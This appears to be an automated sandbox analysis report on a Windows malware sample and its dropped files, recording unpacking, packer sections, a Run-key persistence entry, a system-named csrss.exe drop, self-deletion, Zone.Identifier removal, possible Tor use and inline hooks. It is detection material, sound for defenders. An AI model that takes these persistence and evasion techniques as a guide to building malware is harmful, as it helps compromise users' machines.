Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Unpacked PE file: 0.2.xqz8sQ4mZB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.jeveze:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ibjhisi	Unpacked PE file: 3.2.ibjhisi.400000.0.unpack .text:ER;.rdata:R;.data:W;.jeveze:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Unpacked PE file: 26.2.F6A9.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.hihonag:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Unpacked PE file: 29.2.4E3.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.pajasob:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Unpacked PE file: 37.2.4E3.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.pajasob:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Unpacked PE file: 29.2.4E3.exe.400000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Unpacked PE file: 37.2.4E3.exe.400000.2.unpack

Source: DFD5.exe.1.dr

Static PE information: 0xB5A630E4 [Wed Jul 28 18:33:08 2066 UTC]

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe

Code function: 13_2_6C9CB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

13_2_6C9CB6C0

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp

Source: 1DCB.tmp.38.dr	Static PE information: real checksum: 0x0 should be: 0xb0991
Source: D8BF.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x2321d6
Source: 4E3.exe.1.dr	Static PE information: real checksum: 0x4457c3 should be: 0x452204
Source: 1DCB.tmp.44.dr	Static PE information: real checksum: 0x0 should be: 0xb0991
Source: 1DCB.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x74d370
Source: DFD5.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x461912

Source: xqz8sQ4mZB.exe	Static PE information: section name: .jeveze
Source: 2E76.exe.1.dr	Static PE information: section name: .sugak
Source: D217.exe.1.dr	Static PE information: section name: .vmp
Source: D217.exe.1.dr	Static PE information: section name: .vmp
Source: D217.exe.1.dr	Static PE information: section name: .vmp
Source: D8BF.dll.1.dr	Static PE information: section name: .qdata
Source: D8BF.dll.1.dr	Static PE information: section name: CONST
Source: F6A9.exe.1.dr	Static PE information: section name: .hihonag
Source: 4E3.exe.1.dr	Static PE information: section name: .pajasob
Source: ibjhisi.1.dr	Static PE information: section name: .jeveze
Source: adjhisi.1.dr	Static PE information: section name: .hihonag

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\D8BF.dll

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_004014A1 push es; iretd	0_2_004014A3
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_004022A8 pushfd ; ret	0_2_004022C7
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_006E1506 push es; iretd	0_2_006E150A
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_006E230F pushfd ; ret	0_2_006E232E
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0071FC74 pushfd ; ret	0_2_0071FD53
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0071F64F push 8A1E29FAh; iretd	0_2_0071F654
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_007224DB push ss; iretd	0_2_007224E1
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00725D7C push cs; iretd	0_2_00725D7E
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0071F139 push es; iretd	0_2_0071F159
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_004014A1 push es; iretd	3_2_004014A3
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_004022A8 pushfd ; ret	3_2_004022C7
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005A1506 push es; iretd	3_2_005A150A
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005A230F pushfd ; ret	3_2_005A232E
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005CE66F push 8A1E29FAh; iretd	3_2_005CE674
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005D14FB push ss; iretd	3_2_005D1501
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005CEC94 pushfd ; ret	3_2_005CED73
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005CE159 push es; iretd	3_2_005CE179
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005D4D9C push cs; iretd	3_2_005D4D9E
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_053D980A push 5A36841Dh; retf	6_2_053D9825
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_0537370A pushad ; ret	6_2_0537370C
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_054117F8 push edx; retf	6_2_054117F9
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_053D97ED push ebp; retf	6_2_053D97EE
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_0531F2EF push ebx; iretd	6_2_0531F2F7
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_054114BD push cs; ret	6_2_054114BE
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA1CC2B push ecx; ret	13_2_6CA1CC3E
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA1D565 push ecx; ret	13_2_6CA1D578
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_017D24D9 pushfd ; retf	13_2_017D24DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004546D1 push ecx; iretd	16_2_004546D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044F68D pushad ; iretd	16_2_0044F690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044FAA1 push ecx; iretd	16_2_0044FAA2

Source: initial sample	Static PE information: section name: .text entropy: 7.043948347670188
Source: initial sample	Static PE information: section name: .text entropy: 7.931120260996672
Source: initial sample	Static PE information: section name: .text entropy: 7.042551251445249
Source: initial sample	Static PE information: section name: .text entropy: 7.043948347670188
Source: initial sample	Static PE information: section name: .text entropy: 7.042551251445249

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\CA65.exe

File created: C:\ProgramData\Drivers\csrss.exe

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\adjhisi	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4E3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D8BF.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CA65.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2E76.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1DCB.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\DFD5.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F6A9.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ibjhisi	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	File created: C:\ProgramData\Drivers\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1DCB.exe	File created: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D217.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1DCB.exe	File created: C:\Users\user\AppData\Local\Temp\is-O8IMG.tmp\1DCB.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\CA65.exe

File created: C:\ProgramData\Drivers\csrss.exe

Deletes itself after installation

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ibjhisi			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\adjhisi			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\xqz8sq4mzb.exe

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\ibjhisi:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\adjhisi:Zone.Identifier read attributes \| delete			Jump to behavior

May use the Tor software to hide its network traffic

Source: csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: onion-port

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: D90005 value: E9 2B BA 13 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 76ECBA30 value: E9 DA 45 EC 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: DA0008 value: E9 8B 8E 17 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 76F18E90 value: E9 80 71 E8 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 1700005 value: E9 8B 4D 4F 74	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 75BF4D90 value: E9 7A B2 B0 8B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 1710005 value: E9 EB EB 4F 74	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 75C0EBF0 value: E9 1A 14 B0 8B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 1720005 value: E9 8B 8A 8B 73	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 74FD8A90 value: E9 7A 75 74 8C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 1730005 value: E9 2B 02 8D 73	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Memory written: PID: 6844 base: 75000230 value: E9 DA FD 72 8C	Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
